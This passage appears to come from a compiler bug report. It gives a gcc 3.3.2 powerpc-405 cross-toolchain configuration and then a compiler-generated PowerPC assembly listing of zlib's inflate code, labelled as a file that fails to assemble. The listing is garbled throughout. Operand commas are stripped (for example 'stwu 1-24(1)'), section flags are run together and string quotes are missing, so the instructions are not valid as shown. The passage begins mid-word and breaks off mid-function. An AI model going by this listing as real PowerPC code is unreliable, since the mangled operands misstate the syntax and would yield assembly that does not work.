owerpc-405-linux-gnu/gcc-3.3.2-glibc-2.3.2/lib/gcc-lib/powerpc-405-linux-
gnu/3.3.2/specs
Configured 
with: /home/hsolomon/proj/fabt/cdev/fabt_infosec_spci/src/plat/crosstool/crossto
ol-0.27/build/powerpc-405-linux-gnu/gcc-3.3.2-glibc-2.3.2/gcc-3.3.2/configure --
target=powerpc-405-linux-gnu --host=i686-host_pc-linux-gnu --
prefix=/home/hsolomon/proj/fabt/cdev/fabt_infosec_spci/src/plat/crosstool/result
/powerpc-405-linux-gnu/gcc-3.3.2-glibc-2.3.2 --with-cpu=405 --enable-cxx-flags=-
mcpu=405 --with-
headers=/home/hsolomon/proj/fabt/cdev/fabt_infosec_spci/src/plat/crosstool/resul
t/powerpc-405-linux-gnu/gcc-3.3.2-glibc-2.3.2/powerpc-405-linux-gnu/include --
with-local-
prefix=/home/hsolomon/proj/fabt/cdev/fabt_infosec_spci/src/plat/crosstool/result
/powerpc-405-linux-gnu/gcc-3.3.2-glibc-2.3.2/powerpc-405-linux-gnu --disable-
nls --enable-threads=posix --enable-symvers=gnu --enable-__cxa_atexit --enable-
languages=cc++ --enable-shared --enable-c99 --enable-long-long
Thread model: posix
gcc version 3.3.2
/home/hsolomon/proj/fabt/cdev/fabt_infosec_spci/src/plat/crosstool/result/powerp
c-405-linux-gnu/gcc-3.3.2-glibc-2.3.2/bin/powerpc-405-linux-gnu-as -v
GNU assembler version 2.14 (powerpc-405-linux-gnu) using BFD version 2.14 
20030612
==== compiler generated file zlib.s that fails ====
	.file	zlib.c
	.section	.rodata.str1.4aMS@progbits1
	.align 2
.LC0:
	.string	stream end
	.subsection	-1
	.align 2
.LC1:
	.string	
	.align 2
.LC2:
	.string	file error
	.align 2
.LC3:
	.string	stream error
	.align 2
.LC4:
	.string	data error
	.align 2
.LC5:
	.string	insufficient memory
	.align 2
.LC6:
	.string	buffer error
	.globl z_errmsg
	.section	.data.rel.localaw@progbits
	.align 2
	.type	z_errmsg @object
	.size	z_errmsg 32
z_errmsg:
	.long	.LC0
	.long	.LC1
	.long	.LC2
	.long	.LC3
	.long	.LC4
	.long	.LC5
	.long	.LC6
	.long	.LC1
	.section	.rodata.str1.4
	.align 2
.LC7:
	.string	0.95P
	.globl zlib_version
	.section	.sdataaw@progbits
	.align 2
	.type	zlib_version @object
	.size	zlib_version 4
zlib_version:
	.long	.LC7
	.section	.data
	.align 2
	.type	inflate_mask @object
	.size	inflate_mask 68
inflate_mask:
	.long	0
	.long	1
	.long	3
	.long	7
	.long	15
	.long	31
	.long	63
	.long	127
	.long	255
	.long	511
	.long	1023
	.long	2047
	.long	4095
	.long	8191
	.long	16383
	.long	32767
	.long	65535
	.align 2
	.type	border @object
	.size	border 76
border:
	.long	16
	.long	17
	.long	18
	.long	0
	.long	8
	.long	7
	.long	9
	.long	6
	.long	10
	.long	5
	.long	11
	.long	4
	.long	12
	.long	3
	.long	13
	.long	2
	.long	14
	.long	1
	.long	15
	.align 2
	.type	cpdext @object
	.size	cpdext 120
cpdext:
	.long	0
	.long	0
	.long	0
	.long	0
	.long	1
	.long	1
	.long	2
	.long	2
	.long	3
	.long	3
	.long	4
	.long	4
	.long	5
	.long	5
	.long	6
	.long	6
	.long	7
	.long	7
	.long	8
	.long	8
	.long	9
	.long	9
	.long	10
	.long	10
	.long	11
	.long	11
	.long	12
	.long	12
	.long	13
	.long	13
	.align 2
	.type	cpdist @object
	.size	cpdist 120
cpdist:
	.long	1
	.long	2
	.long	3
	.long	4
	.long	5
	.long	7
	.long	9
	.long	13
	.long	17
	.long	25
	.long	33
	.long	49
	.long	65
	.long	97
	.long	129
	.long	193
	.long	257
	.long	385
	.long	513
	.long	769
	.long	1025
	.long	1537
	.long	2049
	.long	3073
	.long	4097
	.long	6145
	.long	8193
	.long	12289
	.long	16385
	.long	24577
	.align 2
	.type	cplext @object
	.size	cplext 124
cplext:
	.long	0
	.long	0
	.long	0
	.long	0
	.long	0
	.long	0
	.long	0
	.long	0
	.long	1
	.long	1
	.long	1
	.long	1
	.long	2
	.long	2
	.long	2
	.long	2
	.long	3
	.long	3
	.long	3
	.long	3
	.long	4
	.long	4
	.long	4
	.long	4
	.long	5
	.long	5
	.long	5
	.long	5
	.long	0
	.long	192
	.long	192
	.align 2
	.type	cplens @object
	.size	cplens 124
cplens:
	.long	3
	.long	4
	.long	5
	.long	6
	.long	7
	.long	8
	.long	9
	.long	10
	.long	11
	.long	13
	.long	15
	.long	17
	.long	19
	.long	23
	.long	27
	.long	31
	.long	35
	.long	43
	.long	51
	.long	59
	.long	67
	.long	83
	.long	99
	.long	115
	.long	131
	.long	163
	.long	195
	.long	227
	.long	258
	.long	0
	.long	0
	.section	.sbssaw@nobits
	.align 2
fixed_built:
	.zero	4
	.size	fixed_built 4
	.type	fixed_built @object
	.align 2
fixed_lock:
	.zero	4
	.size	fixed_lock 4
	.type	fixed_lock @object
	.section	.data
	.align 2
	.type	fixed_left @object
	.size	fixed_left 4
fixed_left:
	.long	530
	.section	.text
	.align 2
	.type	inflate_codes_free @function
inflate_codes_free:
	mflr 0
	stwu 1-24(1)
	stw 028(1)
	mr 94
	mr 43
	lwz 340(9)
	lwz 936(9)
	li 528
	mtctr 9
	bctrl
	lwz 028(1)
	addi 1124
	mtlr 0
	blr
	.size	inflate_codes_free .-inflate_codes_free
	.align 2
	.type	inflate_trees_free @function
inflate_trees_free:
	stwu 1-24(1)
	stmw 288(1)
	mr. 283
	mflr 0
	mr 314
	stw 028(1)
	beq- 0.L7
.L5:
	addi 2828-8
	lwz 50(28)
	lwz 036(31)
	mr 428
	slwi 553
	mtctr 0
	lwz 340(31)
	lwz 284(28)
	bctrl
	cmpwi 7280
	bne+ 7.L5
.L7:
	lwz 028(1)
	li 30
	lmw 288(1)
	mtlr 0
	addi 1124
	blr
	.size	inflate_trees_free .-inflate_trees_free
	.align 2
	.type	inflate_blocks_reset @function
inflate_blocks_reset:
	mflr 0
	stwu 1-24(1)
	stw 028(1)
	lwz 056(3)
	stmw 3016(1)
	cmpwi 700
	mr 313
	mr 304
	beq- 7.L9
	lwz 060(3)
	stw 00(5)
.L9:
	lwz 90(31)
	addi 99-4
	cmplwi 791
	bgt+ 7.L10
	lwz 524(31)
	lwz 036(30)
	slwi 552
	mtctr 0
	lwz 340(30)
	lwz 412(31)
	bctrl
.L10:
	lwz 00(31)
	cmpwi 706
	bne+ 7.L11
	lwz 312(31)
	mr 430
	bl inflate_codes_free@local
	lwz 38(31)
	mr 430
	bl inflate_trees_free@local
	lwz 34(31)
	mr 430
	bl inflate_trees_free@local
.L11:
	lwz 1156(31)
	lwz 040(31)
	cmpwi 7110
	li 90
	stw 936(31)
	stw 048(31)
	stw 90(31)
	stw 932(31)
	stw 052(31)
	beq+ 7.L12
	li 30
	li 40
	li 50
	mtlr 11
	blrl
	stw 360(31)
.L12:
	lwz 048(30)
	cmpwi 700
	beq+ 7.L8
	li 30
	li 40
	mtlr 0
	blrl
.L8:
	lwz 028(1)
	lmw 3016(1)
	mtlr 0
	addi 1124
	blr
	.size	inflate_blocks_reset .-inflate_blocks_reset
	.align 2
	.globl inflateEnd
	.type	inflateEnd @function
inflateEnd:
	stwu 1-32(1)
	stmw 3024(1)
	mr. 313
	mflr 0
	li 9-2
	stw 036(1)
	beq- 0.L14
	lwz 328(31)
	cmpwi 730
	beq- 7.L14
	lwz 036(31)
	cmpwi 700
	beq- 7.L14
	lwz 3020(3)
	mr 431
	cmpwi 7300
	addi 518
	mr 330
	beq+ 7.L17
	bl inflate_blocks_reset@local
	lwz 440(30)
	lwz 036(31)
	lwz 544(30)
	mtctr 0
	subf 545
	lwz 340(31)
	bctrl
	lwz 036(31)
	mr 430
	lwz 340(31)
	li 564
	mtctr 0
	bctrl
.L17:
	lwz 036(31)
	lwz 340(31)
	mtctr 0
	lwz 428(31)
	li 524
	bctrl
	li 00
	stw 028(31)
	li 90
.L14:
	lwz 036(1)
	mr 39
	lmw 3024(1)
	mtlr 0
	addi 1132
	blr
	.size	inflateEnd .-inflateEnd
	.align 2
	.globl inflateReset
	.type	inflateReset @function
inflateReset:
	mr. 113
	mflr 0
	stwu 1-32(1)
	stw 036(1)
	li 3-2
	beq- 0.L19
	lwz 928(11)
	li 100
	cmpwi 790
	mr 411
	addi 518
	beq- 7.L19
	lwz 012(9)
	lwz 320(9)
	addic 80-1
	subfe 780
	slwi 071
	stw 1024(11)
	stw 00(9)
	stw 1020(11)
	stw 108(11)
	bl inflate_blocks_reset@local
	li 30
.L19:
	lwz 036(1)
	addi 1132
	mtlr 0
	blr
	.size	inflateReset .-inflateReset
	.align 2
	.globl inflateSync
	.type	inflateSync @function
inflateSync:
	stwu 1-40(1)
	stmw 2720(1)
	mr. 313
	mflr 0
	stw 044(1)
	beq- 0.L26
	lwz 928(31)
	cmpwi 790
	bne- 7.L25
.L26:
	li 3-2
	b .L24
.L25:
	lwz 00(9)
	cmpwi 708
	beq- 7.L27
	li 00
	stw 04(9)
	li 08
	stw 00(9)
.L27:
	lwz 84(31)
	li 3-5
	cmpwi 780
	beq- 7.L24
	lwz 728(31)
	lwz 100(31)
	lwz 114(7)
	addic 58-1
	subfe 058
	subfic 9113
	li 90
	adde 999
	and. 609
	mr 610
.L41:
	beq- 0.L40
	lbz 00(10)
	cmplwi 6111
	cmpwi 700
	cmpwi 10255
	mfcr 0
	rlwinm 00311
	neg 00
	bgt- 6.L32
	bne- 7.L31
	b .L33
.L32:
	bne+ 1.L31
.L33:
	addi 11111
	b .L34
.L31:
	subfic 11114
	and 11110
.L34:
	addi 88-1
	subfic 0113
	li 00
	adde 000
	addic 58-1
	subfe 958
	and. 590
	addi 10101
	b .L41
.L40:
	lwz 08(31)
	cmpwi 7114
	subf 9610
	add 009
	stw 08(31)
	stw 100(31)
	stw 84(31)
	li 3-3
	stw 114(7)
	bne- 7.L24
	mr 331
	lwz 288(31)
	lwz 2720(31)
	bl inflateReset@local
	lwz 928(31)
	li 02
	stw 00(9)
	stw 288(31)
	stw 2720(31)
	li 30
.L24:
	lwz 044(1)
	lmw 2720(1)
	mtlr 0
	addi 1140
	blr
	.size	inflateSync .-inflateSync
	.section	.got2aw
.LCTOC1 = .+32768
	.section	.text
	.section	.got2aw
.LC8:
	.long adler32
	.section	.text
	.align 2
	.globl inflateInit2
.LCL6:
	.long .LCTOC1-.LCF6
	.type	inflateInit2 @function
inflateInit2:
	mflr 0
	stwu 1-40(1)
	bcl 2031.LCF6
.LCF6:
	stmw 2512(1)
	mflr 30
	mr. 283
	stw 044(1)
	lwz 0.LCL6-.LCF6(30)
	mr 314
	add 30030
	li 0-2
	beq- 0.L42
	lwz 032(28)
	lwz 340(28)
	mtctr 0
	li 41
	li 524
	bctrl
	cmpwi 730
	stw 328(28)
	li 0-4
	beq- 7.L42
	cmpwi 7310
	li 00
	stw 012(3)
	stw 020(3)
	bge+ 7.L45
	li 01
	stw 012(3)
	neg 3131
.L45:
	addi 031-8
	cmplwi 707
	ble+ 7.L46
	mr 328
	bl inflateEnd@local
	li 0-2
	b .L42
.L46:
	lwz 2628(28)
	li 250
	lwz 012(26)
	stw 3116(26)
	cmpwi 700
	bne- 7.L49
	lwz 25.LC8-.LCTOC1(30)
.L49:
	lwz 032(28)
	lwz 340(28)
	mtctr 0
	li 41
	li 564
	li 01
	slw 27031
	bctrl
	mr. 313
	li 00
	beq- 0.L51
	lwz 032(28)
	lwz 340(28)
	mtctr 0
	li 41
	mr 527
	bctrl
	cmpwi 730
	stw 340(31)
	bne- 7.L52
	lwz 036(28)
	mr 431
	mtctr 0
	lwz 340(28)
	li 564
	bctrl
	li 00
	b .L51
.L52:
	add 0327
	stw 044(31)
	li 00
	stw 00(31)
	stw 2556(31)
	mr 331
	mr 428
	addi 53160
	bl inflate_blocks_reset@local
	mr 031
.L51:
	cmpwi 700
	stw 020(26)
	bne+ 7.L47
	mr 328
	bl inflateEnd@local
	li 0-4
	b .L42
.L47:
	mr 328
	bl inflateReset@local
	li 00
.L42:
	mr 30
	lwz 044(1)
	lmw 2512(1)
	mtlr 0
	addi 1140
	blr
	.size	inflateInit2 .-inflateInit2
	.align 2
	.globl inflateInit
	.type	inflateInit @function
inflateInit:
	stwu 1-24(1)
	li 415
	addi 1124
	b inflateInit2@local
	.size	inflateInit .-inflateInit
	.align 2
	.type	inflate_codes_new @function
inflate_codes_new:
	mflr 0
	stwu 1-40(1)
	stw 044(1)
	stmw 2720(1)
	mr 303
	lwz 340(7)
	lwz 732(7)
	mr 284
	mr 275
	mtctr 7
	li 41
	li 528
	mr 316
	bctrl
	mr. 93
	beq- 0.L55
	li 00
	stw 3124(9)
	stw 00(9)
	stb 3016(9)
	stb 2817(9)
	stw 2720(9)
.L55:
	lwz 044(1)
	lmw 2720(1)
	mtlr 0
	addi 1140
	blr
	.size	inflate_codes_new .-inflate_codes_new
	.align 2
	.globl inflateIncomp
	.type	inflateIncomp @function
inflateIncomp:
	mflr 0
	stwu 1-56(1)
	stw 060(1)
	lwz 928(3)
	stmw 2216(1)
	lwz 00(9)
	mr 273
	cmpwi 702
	li 3-3
	bne- 7.L56
	lwz 3120(9)
	li 3-2
	lwz 448(31)
	lwz 052(31)
	cmpw 740
	bne+ 7.L56
	lwz 00(31)
	li 3-3
	cmpwi 700
	bne- 7.L56
	lwz 264(27)
	lwz 044(31)
	cmpwi 7260
	mr 284
	subf 2440
	lwz 250(27)
	lwz 2336(31)
	lwz 2232(31)
	beq- 7.L73
.L71:
	cmplw 72624
	mr 428
	mr 3026
	ble- 7.L65
	mr 3024
.L65:
	lwz 056(31)
	mr 530
	cmpwi 700
	subf 263026
	beq+ 7.L66
	lwz 360(31)
	mtlr 0
	blrl
	stw 360(31)
.L66:
	lwz 048(27)
	mr 328
	cmpwi 700
	mr 430
	beq+ 7.L67
	mtlr 0
	blrl
.L67:
	mr 328
	mr 425
	mr 530
	bl memcpy@plt
	lwz 944(31)
	add 282830
	lwz 020(27)
	cmpw 7289
	add 0030
	cmpwi 6260
	stw 020(27)
	stw 2848(31)
	add 252530
	bne+ 7.L63
	lwz 2840(31)
	subf 24289
	stw 2848(31)
.L63:
	bne+ 6.L71
.L73:
	lwz 00(27)
	stw 2336(31)
	lwz 98(27)
	subf 0025
	add 990
	stw 250(27)
	stw 2232(31)
	stw 2852(31)
	stw 98(27)
	stw 264(27)
	li 30
.L56:
	lwz 060(1)
	lmw 2216(1)
	mtlr 0
	addi 1156
	blr
	.size	inflateIncomp .-inflateIncomp
	.align 2
	.type	inflate_flush @function
inflate_flush:
	mflr 0
	stwu 1-40(1)
	stw 044(1)
	stmw 2512(1)
	lwz 052(3)
	lwz 3048(3)
	mr 283
	cmplw 7300
	mr 274
	mr 255
	lwz 2612(4)
	subf 31300
	ble- 7.L76
	lwz 044(3)
	subf 31300
.L76:
	lwz 1016(27)
	cmplw 73110
	ble- 7.L77
	mr 3110
.L77:
	lwz 856(28)
	subfic 1125-5
	subfic 0110
	adde 11011
	cmpwi 780
	addic 931-1
	subfe 0931
	lwz 920(27)
	and 0011
	addic 00-1
	subfe 000
	subf 113110
	add 9931
	and 25250
	stw 1116(27)
	stw 920(27)
	beq+ 7.L79
	lwz 360(28)
	mr 430
	mr 531
	mtlr 8
	blrl
	stw 360(28)
.L79:
	lwz 048(27)
	cmpwi 700
	beq+ 7.L80
	mr 330
	mr 431
	mtlr 0
	blrl
.L80:
	mr 326
	mr 430
	mr 531
	bl memcpy@plt
	lwz 944(28)
	add 303031
	cmpw 7309
	add 262631
	bne+ 7.L81
	lwz 052(28)
	lwz 3040(28)
	cmpw 709
	bne+ 7.L82
	stw 3052(28)
.L82:
	lwz 052(28)
	lwz 1016(27)
	subf 31300
	cmplw 73110
	ble- 7.L83
	mr 3110
.L83:
	lwz 856(28)
	subfic 1125-5
	subfic 0110
	adde 11011
	cmpwi 780
	addic 931-1
	subfe 0931
	lwz 920(27)
	and 0011
	addic 00-1
	subfe 000
	subf 113110
	add 9931
	and 25250
	stw 1116(27)
	stw 920(27)
	beq+ 7.L85
	lwz 360(28)
	mr 430
	mr 531
	mtlr 8
	blrl
	stw 360(28)
.L85:
	lwz 048(27)
	cmpwi 700
	beq+ 7.L86
	mr 330
	mr 431
	mtlr 0
	blrl
.L86:
	mr 326
	mr 430
	mr 531
	bl memcpy@plt
	add 262631
	add 303031
.L81:
	lwz 044(1)
	stw 2612(27)
	mr 325
	stw 3048(28)
	mtlr 0
	lmw 2512(1)
	addi 1140
	blr
	.size	inflate_flush .-inflate_flush
	.align 2
	.type	huft_build @function
huft_build:
	mflr 0
	mtctr 4
	stwu 1-1472(1)
	stw 01476(1)
	li 00
	stmw 151404(1)
	stw 81372(1)
	stw 101376(1)
	stw 076(1)
	stw 51360(1)
	stw 61364(1)
	stw 71368(1)
	stw 016(1)
	stw 020(1)
	stw 024(1)
	stw 028(1)
	stw 032(1)
	stw 036(1)
	stw 040(1)
	stw 044(1)
	mr 154
	stw 048(1)
	mr 89
	stw 052(1)
	stw 056(1)
	stw 060(1)
	stw 064(1)
	stw 068(1)
	stw 072(1)
	li 260
	li 270
	mr 303
	addi 1018
.L180:
	lwz 110(30)
	addi 30304
	slwi 11112
	add 111110
	lwz 98(11)
	addi 991
	stw 98(11)
	bdnz .L180
	lwz 016(1)
	cmpw 7015
	bne+ 7.L91
	li 00
	stw 00(8)
	lwz 81372(1)
	li 30
	stw 00(8)
	b .L87
.L91:
	lwz 210(8)
	li 311
	addi 91012
.L96:
	lwz 00(9)
	addi 994
	cmpwi 700
	bne- 7.L93
	addi 31311
	cmplwi 73115
	ble+ 7.L96
.L93:
	cmplw 72131
	mr 2031
	bge- 7.L97
	mr 2131
.L97:
	li 2515
	addi 91068
.L102:
	lwz 00(9)
	addi 99-4
	cmpwi 700
	bne- 7.L99
	addic. 2525-1
	bne+ 0.L102
.L99:
	cmplw 72125
	mr 1725
	ble- 7.L103
	mr 2125
.L103:
	cmplw 73117
	li 01
	stw 210(8)
	slw 19031
	bge- 7.L160
	slwi 9312
	add 9910
	addi 998
.L108:
	lwz 00(9)
	addi 31311
	subf. 19019
	cmplw 73125
	addi 994
	slwi 19191
	blt- 0.L176
	blt+ 7.L108
.L160:
	slwi 0252
	addi 818
	add 908
	lwz 08(9)
	subf. 19019
	blt- 0.L176
	addic. 2525-1
	add 0019
	li 310
	stw 08(9)
	stw 311300(1)
	addi 30120
	addi 911304
	beq- 0.L162
	mtctr 25
.L179:
	lwz 00(30)
	addi 30304
	add 31310
	stw 310(9)
	addi 994
	bdnz .L179
.L162:
	cmplwi 7150
	mr 303
	li 250
	mr 015
	bgt- 7.L178
	li 01
.L178:
	mtctr 0
.L177:
	lwz 00(30)
	addi 30304
	cmpwi 700
	slwi 002
	add 1008
	beq- 7.L115
	lwz 91288(10)
	slwi 1192
	add 11118
	addi 991
	stw 91288(10)
	stw 25136(11)
.L115:
	addi 25251
	bdnz .L177
	cmpw 72017
	li 250
	addi 301144
	stw 251296(1)
	stw 2580(1)
	li 16-1
	neg 2321
	li 30
	li 180
.L181:
	bgt- 7.L164
	slwi 0202
	add 910
	lwz 2216(9)
	stw 01380(1)
.L187:
	cmpwi 7220
	addi 2222-1
	beq- 7.L166
	add 282321
.L183:
	cmpw 72028
	ble- 7.L168
	subf 182817
	cmplw 71821
	mr 2328
	addi 16161
	mr 1021
	bgt- 7.L125
	mr 1018
.L125:
	li 01
	subf 312820
	slw 11031
	addi 0221
	cmplw 7110
	ble- 7.L126
	cmplw 73110
	lwz 01380(1)
	subf 92211
	addi 8116
	addi 119-1
	add 980
	bge- 7.L126
	addi 31311
	cmplw 73110
.L184:
	bge- 7.L126
	lwzu 04(9)
	slwi 11111
	cmplw 7110
	subf 11011
	ble- 7.L126
	addi 31311
	cmplw 73110
	b .L184
.L126:
	lwz 81376(1)
	li 01
	slw 18031
	lwz 832(8)
	lwz 91376(1)
	addi 24181
	mtctr 8
	lwz 340(9)
	mr 424
	li 58
	bctrl
	cmpwi 030
	cmpwi 7160
	bne+ 0.L132
	beq+ 7.L133
	lwz 380(1)
	lwz 41376(1)
	bl inflate_trees_free@local
.L133:
	li 3-4
	b .L87
.L132:
	stw 240(3)
	addi 018
	lwz 81372(1)
	slwi 9162
	addi 1138
	add 1090
	li 00
	stw 110(8)
	stw 04(3)
	addi 334
	stw 31372(1)
	stw 1172(10)
	mr 311
	beq- 7.L122
	rlwimi 262116815
	subf 02128
	lwz 1168(10)
	rlwimi 26312407
	srw 31250
	slwi 9313
	add 9911
	stw 251288(10)
	mr 273
	stw 260(9)
	stw 34(9)
.L122:
	add 282821
	b .L183
.L168:
	slwi 0152
	addi 91144
	add 090
	cmplw 7300
	subf 112320
	rlwimi 261116815
	blt- 7.L136
	li 0-64
	rlwimi 2602407
	b .L137
.L136:
	lwz 90(30)
	lwz 101360(1)
	cmplw 7910
	bge- 7.L138
	subfic 09255
	subfe 000
	rlwinm 0002526
	rlwimi 2602407
	mr 279
	addi 30304
	b .L137
.L138:
	lwz 81360(1)
	lwz 101368(1)
	subf 089
	slwi 002
	lwzx 9100
	lwz 81364(1)
	addi 9980
	lwzx 2780
	addi 30304
	rlwimi 2692407
.L137:
	srw 312523
	cmplw 73118
	li 01
	slw 11011
.L185:
	bge- 7.L171
	slwi 9313
	add 313111
	cmplw 73118
	add 993
	stw 260(9)
	stw 274(9)
	b .L185
.L171:
	li 91
	addi 020-1
	slw 3190
	and. 92531
.L186:
	beq- 0.L173
	xor 252531
	srwi 31311
	and. 102531
	b .L186
.L173:
	slwi 9162
	addi 018
	add 1190
	li 91
	slw 9923
	xor 252531
	addi 99-1
	lwz 01288(11)
	and 9259
	cmpw 790
	beq- 7.L187
	addi 11111288
	li 101
.L152:
	subf 232123
	slw 91023
	addi 99-1
	lwzu 0-4(11)
	and 9259
	cmpw 790
	addi 1616-1
	bne+ 7.L152
	b .L187
.L166:
	addi 20201
	cmpw 72017
	b .L181
.L164:
	xori 0171
	addic 1119-1
	subfe 91119
	addic 100-1
	subfe 8100
	and. 1198
	li 3-5
	bne- 0.L87
	b .L155
.L176:
	li 3-3
	b .L87
.L155:
	li 30
.L87:
	lwz 01476(1)
	lmw 151404(1)
	mtlr 0
	addi 111472
	blr
	.size	huft_build .-huft_build
	.section	.got2aw
.LC9:
	.long fixed_left
.LC10:
	.long fixed_mem
	.section	.text
	.align 2
.LCL12:
	.long .LCTOC1-.LCF12
	.type	falloc @function
falloc:
	stwu 1-24(1)
	mflr 0
	bcl 2031.LCF12
.LCF12:
	stmw 3016(1)
	mflr 30
	stw 028(1)
	lwz 0.LCL12-.LCF12(30)
	add 30030
	lwz 11.LC9-.LCTOC1(30)
	lwz 3.LC10-.LCTOC1(30)
	lwz 00(11)
	lmw 3016(1)
	subf 040
	slwi 903
	stw 00(11)
	lwz 028(1)
	add 393
	mtlr 0
	addi 1124
	blr
	.size	falloc .-falloc
	.align 2
	.type	ffree @function
ffree:
	stwu 1-24(1)
	addi 1124
	blr
	.size	ffree .-ffree
	.section	.rodata.str1.4
	.align 2
.LC11:
	.string	unknown compression method
	.align 2
.LC13:
	.string	invalid window size
	.align 2
.LC15:
	.string	invalid reserved bit
	.align 2
.LC17:
	.string	incorrect header check
	.align 2
.LC33:
	.string	invalid stored block lengths
	.align 2
.LC31:
	.string	invalid block type
	.align 2
.LC35:
	.string	too many length or distance symbols
	.align 2
.LC38:
	.string	oversubscribed dynamic bit lengths tree
	.align 2
.LC40:
	.string	incomplete dynamic bit lengths tree
	.align 2
.LC43:
	.string	invalid bit length repeat
	.align 2
.LC45:
	.string	oversubscribed literal/length tree
	.align 2
.LC47:
	.string	incomplete literal/length tree
	.align 2
.LC49:
	.string	invalid distance code
	.align 2
.LC51:
	.string	invalid literal/length code
	.align 2
.LC55:
	.string	incorrect data check
	.section	.got2aw
.LC12:
	.long .LC11
.LC14:
	.long .LC13
.LC16:
	.long .LC15
.LC18:
	.long .LC17
.LC19:
	.long fixed_lock
.LC20:
	.long fixed_built
.LC21:
	.long falloc
.LC22:
	.long ffree
.LC23:
	.long fixed_bl
.LC24:
	.long cplens
.LC25:
	.long cplext
.LC26:
	.long fixed_tl
.LC27:
	.long fixed_bd
.LC28:
	.long cpdist
.LC29:
	.long cpdext
.LC30:
	.long fixed_td
.LC32:
	.long .LC31
.LC34:
	.long .LC33
.LC36:
	.long .LC35
.LC37:
	.long border
.LC39:
	.long .LC38
.LC41:
	.long .LC40
.LC42:
	.long inflate_mask
.LC44:
	.long .LC43
.LC46:
	.long .LC45
.LC48:
	.long .LC47
.LC50:
	.long .LC49
.LC52:
	.long .LC51
.LC53:
	.long .L466
.LC54:
	.long .L478
.LC56:
	.long .LC55
.LC57:
	.long .L497
	.section	.text
	.align 2
	.globl inflate
.LCL14:
	.long .LCTOC1-.LCF14
	.type	inflate @function
inflate:
	mflr 0
	stwu 1-1328(1)
	bcl 2031.LCF14
.LCF14:
	stmw 161264(1)
	mflr 30
	mr. 273
	stw 01332(1)
	lwz 0.LCL14-.LCF14(30)
	mr 164
	add 30030
	beq- 0.L496
	lwz 00(27)
	li 3-5
	cmpwi 700
	beq- 7.L496
.L634:
	lwz 1028(27)
	lwz 00(10)
	cmplwi 708
	bgt- 7.L496
	lwz 9.LC57-.LCTOC1(30)
	slwi 002
	lwzx 090
	add 009
	mtctr 0
	bctr
	.section	.rodata
	.align 2
	.align 2
.L497:
	.long .L198-.L497
	.long .L203-.L497
	.long .L207-.L497
	.long .L485-.L497
	.long .L487-.L497
	.long .L489-.L497
	.long .L491-.L497
	.long .L494-.L497
	.long .L629-.L497
	.section	.text
.L198:
	lwz 114(27)
	cmpwi 7110
	beq- 7.L200
	lwz 98(27)
	addi 011-1
	addi 991
	lwz 110(27)
	stw 04(27)
	stw 98(27)
	lbz 00(11)
	addi 11111
	rlwinm 8002831
	cmpwi 788
	stw 110(27)
	stw 04(10)
	li 30
	lwz 1028(27)
	beq- 7.L201
	lwz 0.LC12-.LCTOC1(30)
	stw 024(27)
	li 05
	stw 04(10)
	li 08
	stw 00(10)
	b .L634
.L201:
	lwz 94(10)
	lwz 016(10)
	srwi 994
	addi 998
	cmplw 790
	ble- 7.L202
	lwz 0.LC14-.LCTOC1(30)
	stw 80(10)
	stw 024(27)
	li 05
	stw 04(10)
	b .L634
.L202:
	li 01
	stw 00(10)
.L203:
	lwz 94(27)
	cmpwi 790
	beq- 7.L200
	lwz 118(27)
	addi 09-1
	addi 11111
	lwz 90(27)
	stw 118(27)
	stw 04(27)
	lbz 00(9)
	addi 991
	andi. 11032
	stw 90(27)
	li 30
	lwz 1028(27)
	beq- 0.L205
	lwz 0.LC16-.LCTOC1(30)
	stw 024(27)
	li 05
	stw 04(10)
	li 08
	stw 00(10)
	b .L634
.L205:
	lwz 114(10)
	lis 90x842
	slwi 11118
	add 11110
	ori 994229
	mulhwu 9119
	subf 0911
	srwi 001
	add 990
	srwi 994
	mulli 9931
	cmpw 7119
	beq- 7.L206
	lwz 0.LC18-.LCTOC1(30)
	stw 024(27)
	li 05
	stw 04(10)
	li 08
	stw 00(10)
	b .L634
.L206:
	li 02
	stw 00(10)
.L207:
	lwz 928(27)
	mr 203
	lwz 3120(9)
	lwz 240(27)
	lwz 2352(31)
	lwz 948(31)
	lwz 224(27)
	cmplw 7239
	subf 9239
	addi 219-1
	lwz 2536(31)
	lwz 2632(31)
	blt- 7.L635
	b .L208
.L558:
	lwz 00(27)
	stw 2536(31)
	lwz 98(27)
	subf 0024
	add 990
	li 09
	stw 00(31)
	lwz 0.LC34-.LCTOC1(30)
	stw 2632(31)
	stw 240(27)
	stw 024(27)
	stw 224(27)
	stw 98(27)
	stw 2352(31)
	mr 331
	mr 427
	li 5-3
	bl inflate_flush@local
	b .L218
.L566:
	lwz 31260(1)
	mr 427
	bl inflate_trees_free@local
	lwz 31256(1)
	mr 427
	bl inflate_trees_free@local
.L631:
	lwz 00(27)
	stw 2536(31)
	lwz 98(27)
	subf 0024
	add 990
	mr 331
	mr 427
	li 5-4
	stw 2632(31)
	stw 240(27)
	stw 224(27)
	stw 98(27)
	stw 2352(31)
	b .L628
.L576:
	lwz 00(27)
	stw 2536(31)
	lwz 98(27)
	subf 0024
	add 990
	stw 2632(31)
	stw 240(27)
	stw 224(27)
	stw 98(27)
	stw 2352(31)
.L632:
	mr 331
	mr 520
.L633:
	mr 427
	b .L628
.L208:
	lwz 044(31)
	subf 21230
.L635:
	lwz 00(31)
	cmplwi 709
	bgt- 7.L477
	lwz 9.LC54-.LCTOC1(30)
	slwi 002
	lwzx 090
	add 009
	mtctr 0
	bctr
	.section	.rodata
	.align 2
	.align 2
.L478:
	.long .L213-.L478
	.long .L251-.L478
	.long .L260-.L478
	.long .L278-.L478
	.long .L288-.L478
	.long .L636-.L478
	.long .L345-.L478
	.long .L471-.L478
	.long .L475-.L478
	.long .L476-.L478
	.section	.text
.L213:
	cmplwi 7262
.L611:
	bgt- 7.L510
	cmpwi 7220
	beq- 7.L576
	lbz 00(24)
	addi 2222-1
	slw 0026
	addi 26268
	cmplwi 7262
	or 25250
	addi 24241
	li 200
	b .L611
.L510:
	rlwinm 925313031
	cmpwi 791
	rlwinm 02503131
	stw 028(31)
	beq- 7.L222
	cmplwi 791
	blt- 7.L221
	cmpwi 792
	beq- 7.L249
	cmpwi 793
	beq- 7.L250
	b .L635
.L221:
	addi 2626-3
	rlwinm 282602931
	srwi 25253
	subf 262826
	srw 252528
	li 01
	b .L609
.L222:
	lwz 11.LC19-.LCTOC1(30)
	lwz 90(11)
	addi 991
	cmpwi 791
	stw 90(11)
	ble- 7.L512
.L225:
	cmpwi 791
	mr 09
	bgt+ 7.L225
	stw 00(11)
.L512:
	lwz 9.LC20-.LCTOC1(30)
	lwz 90(9)
